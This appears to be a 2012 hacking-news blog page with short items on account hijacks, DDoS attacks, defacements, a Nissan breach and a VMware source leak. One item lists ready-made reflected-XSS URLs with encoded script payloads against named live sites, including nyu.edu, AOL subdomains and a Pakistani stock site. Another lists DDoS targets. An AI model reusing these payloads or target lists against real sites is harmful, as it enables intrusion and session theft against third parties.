Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Al Arabiya's Twitter & Facebook accounts hacked by Syrian Electronic Army

Social networking accounts belong to Al-Arabiya, one of the leading satellite news channels in the Middle East, hacked by Syrian Electronic Army(SEA) and posted false news on the company's behalf.

According to the official report, Hackers posted news about an explosion at a Qatari natural gas field that killed dozens of people. A story about a coup in Qatar was also published.


Hackers also posted a story reporting a series of explosions in the Syrian city of Tartus and another alleging that international observers had been shot on their way out of Homs.

"Al Arabiya’s accounts on social networking accounts have been subjected to several hacking attempts by the Syrian Electronic Army for covering anti-regime demonstrations and exposing the brutality Bashar al-Assad’s regime. " The report reads.

This is the not the first time Al Arabiya being hacked. On march 27, hackers affiliated to Assad’s electronic army hacked the account of Al Arabiya English on Facebook, but it was restored a few hours later.



Read more »

XSS vulnerability found in 20 High profile sites by GOH group



An Indian ethical hacker named Akshay AKA 0z0n3 beloging to the hacking crew called GOH (godofhackers) has found 20 high profiled sites vulnerable to non-persistant xss attacks.


The list of Vulnerable site with their Screenshots:

1. nyu.edu - vunl link - http://www.nyu.edu/search.html?search=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E - snap - http://i49.tinypic.com/33v2hkz.png

2. barclays.co.uk - snap - http://i46.tinypic.com/wrhlp4.png status - patched

3. pakistanstockexchange.com - vunl link - http://pakstockexchange.com/stock2/index_new.php?section=research&page=company_chooser_new&keyword=\%27;alert%28String.fromCharCode%2888,83,83%29%29//\\\%27;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//\\\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E\%22%3E\%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E snap - http://i49.tinypic.com/16huvi9.png

4. lilwaynehq.com- official site of lil wayne - vunl link - http://www.lilwaynehq.com/?s=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%20by%200z0n3%20of%20.::[GOH]::.%22%29%3C%2FSCRIPT%3E%22%3E snap - http://i50.tinypic.com/zugubs.png

5.mercury-pc.com - vunl link - http://www.mercury-pc.com/search.php snap - http://i48.tinypic.com/b624qa.png

6.transcend.com - vunl link - http://www.transcend-info.com/Support/Search/index.asp snap - http://i47.tinypic.com/28letjc.png

7.bangladeshtradeinfo.com - vunl link - http://www.bdtradeinfo.com//yellowpages/search.asp?search=%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C/SCRIPT%3E%22%3E snap - http://i49.tinypic.com/dzc68.png

8.defense.aol.com - vunllink - http://defense.aol.com/search/?q=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E snap - http://i49.tinypic.com/6fpgeq.png

9.gov.aol.com - vunllink - http://gov.aol.com/search/?q=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E snap - http://i47.tinypic.com/f0n59x.png

10.http://www.unicc.org/ - http://i39.tinypic.com/352iycw.png

11.http://www.un.org.au - http://i44.tinypic.com/critx.jpg

12.http://unfccc.int - http://i40.tinypic.com/e0qrdf.png

13.http://search2.unaids.org - http://i43.tinypic.com/4gruww.png

14.http://unu.edu - http://i39.tinypic.com/v8odw9.png

15.http://www.unpri.org - http://i41.tinypic.com/20pegsj.png

16.http://www.uneval.org - http://i50.tinypic.com/2w3t2lz.png

17. http://www.unscn.org - http://i49.tinypic.com/11ugo76.jpg

18.http://www.undg.org - http://i45.tinypic.com/2zp2s6v.png

19.http://www.alienwarearena.com/ - http://i47.tinypic.com/vzbwif.png

20.www.games.com - aolsubdomain - http://i47.tinypic.com/33z9v8m.png
Read more »
DDOS Attacks
Breaking News DDOS Attacks

Pastie went offline, needs help of experts to protect against ddos attack

Pastie.org , one of the popular paste website, has been targeted by hackers with two distributed denial of service(DDoS) attack last night.

Following that attack,Rails Machine has decided to no longer host and sponsor the site in order to protect it's network and other customers .

"I really feel bad about this. I'm just a single person running the site free of charge. I make a very minimal amount of monthly income from the ads. Probably just enough to cover hosting now that I don't have a sponsor." Josh Goebel, founder of pastie said in the main site.

"I guess this is just one of the downsides of running a large, popular site, but it's very frustrating. "

Goebel is currently seeking help from someone with expertise in protection against DDOS attacks. If anyone ready to help him, they can contact him.
Read more »
Security Breach
Security Breach

Intruders steal employee's ID and encrypted password from Nissan

Two weeks after being hacked, Nissan admitted their computer system penetrated by unknown hackers who steal employee's ID and encrypted passwords.

The hack took place on april 13 but the company issued a statement about the attack on april 20 only.

"This included actions to protect information related to customers, employees and other partners worldwide. This incident initially involved the malicious placement of malware within our IS network, which then allowed transfer from a data store, housing employee user account credentials."Andy Palmer, Executive Vice President, Nissan Motor Co., Ltd said in the statement.

"As a result of our swift and deliberate actions we believe thatour systems are secure and that no customer, employee or program data has been compromised. However, we believe that user IDs and hashed passwords were transmitted. Wehave no indication that any personal information and emails have been compromised." he added
Read more »
DDOS Attacks
Anonymous Hackers DDOS Attacks

DOJ and 14 more sites take down by @DwayneV1x


Anonymous Hacker @DwayneV1x launched distributed-denial-of-service attack against Department of Justice official site. Earlier today, the website justice.gov went offline.



Hacker also take down 14 more websites to support the "#OpBahrain" operation . The list of ddosed sites:

  • http://albabahrain.com
  • http://albabh.com
  • http://aluminiumbahrain.com
  • http://citypharmacy.com
  • http://dawancoindustries.com
  • http://deekobahrain.com
  • http://dns2.al-nadeem.com
  • http://mail.uic.bh
  • http://nbbonline.com
  • http://www.nac.gov.bh
  • http://www.nbbonline.com
  • http://www.uic.bh 
  • http://www.fbijobs.gov 
  • http://explorefbi.com/
  •  http://todaysfbi.com
  •  http://fbievents.com 



Read more »

Anonymous Hacker 'HardcoreCharle' leaked VMWare Source Code


It is bad news for VMWare , Anonymous Hacker 'HardcoreCharle' leaked the preview of the VMWare source code in pastebin.

"VMware Kernel leak preview http://pastebin.com/JGxdK6vw Release of EMC src will follow over" Hacker tweeted.

"Oops, VMWare source leaked? Not good :) [link] thx to Anonymous contributors. May the Pirate Bay always sail strong!" AnonymousIRC tweet about the leak.

http://pastebin.com/JGxdK6vw

"Yesterday, April 23, 2012, our security team became aware of the public posting of a single file from the VMware ESX source code and the possibility that more files may be posted in the future. The posted code and associated commentary dates to the 2003 to 2004 timeframe." Iain Mulholland,Director, VMware Security Response Center said.

"The fact that the source code may have been publicly shared does not necessarily mean that there is any increased risk to VMware customers. VMware proactively shares its source code and interfaces with other industry participants to enable the broad virtualization ecosystem today. We take customer security seriously and have engaged internal and external resources, including our VMware Security Response Center, to thoroughly investigate. We will continue to provide updates to the VMware community if and when additional information is available."
Read more »
Vulnerability
Application Vulnerability Vulnerability

Vulnerability in TreasonSMS allows hackers to run malicious code in iPhone


Vulnerability-lab researchers discovered HTML Inject & File Include Vulnerability in the TreasonSMS app that allows hackers to run the malicious code inside the iPhone.

About TreasonSMS app:
TreasonSMS allows you to send SMS from your desktop computer. It turns your iPhone into a SMS webserver, so you can send sms and reply to SMS from your computer over wifi.

According to the security advisory provided by researchers, the vulnerability allows an remote attacker to include malicious persistent script codes on application-side of the iphone.

This possible way allows the attacker also to inject for example webshell scripts to get control of the affected application folder. When the IPhone is jailbreaked the vulnerability exploitation can also result full controll of the affected IPhone.

"The Bug is located in the input fields of the Message Sending & Message Output. An attacker can scan the victim on walkthrough because the ip of the webserver makes the treasonSMS available to anybody without password.To exploit somebody on a walkthourgh its only required to scan for the stable ip via wlan and access the panel for exploitation." Researcher said.

The vulnerability-Lab estimated the vulnerability as High Severity.

Read more »
Cyber War
Anonymous Philippines Chinese Hackers Cyber War

Anonymous Philippines fight back ,defaced Chinese websites

Filipino hactivists have hacked and defaced a number of Chinese websites in retaliation for the defacing of the University of the Philippines (UP) website.

"Anonymous #OccupyPhilippines" attacked the China University Media Union site, replacing its homepage content with a digitized image of a Guy Fawkes mask, which symbolizes global protest hacking group Anonymous. Their message: "Chinese government is clearly retarded. Scarborough Shoal is ours!"

The Asiaone reports that hackers broke into a Chinese government site, http://gh.rc.gov.cn/, and posted a map of the West Philippine Sea (South China Sea).

"You got fucked by the Philippines! Spratly Island Is OURS!," Hackers wrote.

Hackers also hacked the following Chinese sites: http://www.lanseyinxiang.com/, v.cyol.com, http://sanxinsudi.com, ploft.cn and ryjzw.com.
Read more »
Mass Defacments
3xp1r3 Cyber Army Bangladeshi hackers Defaced Website Mass Defacments

1700+ Indian Sites Hacked By 3xp1r3 Cyber Army

Bangladeshi Underground Hacking Team "3xp1r3 Cyber Army" Hacked 1700+ Indian websites by single click from a Indian Server on 24/04/2012 to Protest against BSF Brutality.

They said on their Defacement page, "This war 'll never end. It's will be continued until BSF (Indian Border Defense Force) stop killing Bangladeshi people on Bangladesh-India Border!"


The hacks were announced on April 24 on a Their official Facebook Group http://www.facebook.com/groups/3xp1r3/ and through a list posted to the programmer website Pastebin ( http://pastebin.com/M58j1E2F ) .

The 3xp1r3 Media also said that mass defacement is being completed by using their own mass defacement tools named '3xp1r3 AK 47'. "3xp1r3 AK 47" is a script based most powerful tools invented by 3xp1r3 and we are using many other personal tools like it to continue.

 After Announcing Cyber War between Bangladesh and India, 3xp1r3 Hacked About 10,000+ indian websites. Mirrors can be found here: http://zone-h.org/archive/notifier=3xp1r3
Read more »
Anonymous Hackers
Anonymous Hackers

AnonTune: a new free music streaming service from Anonymous

 
Following the AnonyUpload, Anonymous OS, AnonPaste services, there is one more service launched by Anonymous "AnonTune".

www.anontune.com designed to offer free music streaming, similar to radio, while hoping to avoid the wrath of copyright holders.

The site will not store any content. Instead, it will search the Internet, including P2P, FTP, and even torrents, for whatever the user wants to listen to.

Similar to some of the previous so-called Anonymous services, AnonTune was also heavily criticized for things such as using Java and the name of the online activist community. The developers responded by issuing statement in pastebin for such criticism.
Read more »
Cyber Attacks
Cyber Attacks

Iranian oil ministry's computer network under cyber attack from hackers

Iranian oil ministry and national oil company are offline after suffering malware attack on sunday, the BBC report says.

Equipment on the Kharg island and at other Iranian oil plants has been disconnected from the net as a precaution.

Oil production had not been affected by the attack, said the Mehr news agency.

However, the attack is believed to have been responsible for knocking offline the websites of the Iranian oil ministry and national oil company.

The Ministry website was back in action on Monday but the oil company site has remained unreachable.

An Iranian oil ministry spokesperson was quoted as saying that data about users of the sites had been stolen as a result of the attack. Core data about Iran's oil industry remained safe because it was on computer systems that remain separate from the net, they added.

The terminal on Kharg Island handles about 90% of Iran's oil exports.

Iran is reported to have mobilised a "cyber crisis committee" to handle the aftermath of the attack and bolster defences.

This committee was set up following attacks in 2010 by a virus known as Stuxnet that was aimed at the nation's nuclear programme.
Read more »
Subscribe to: Comments (Atom)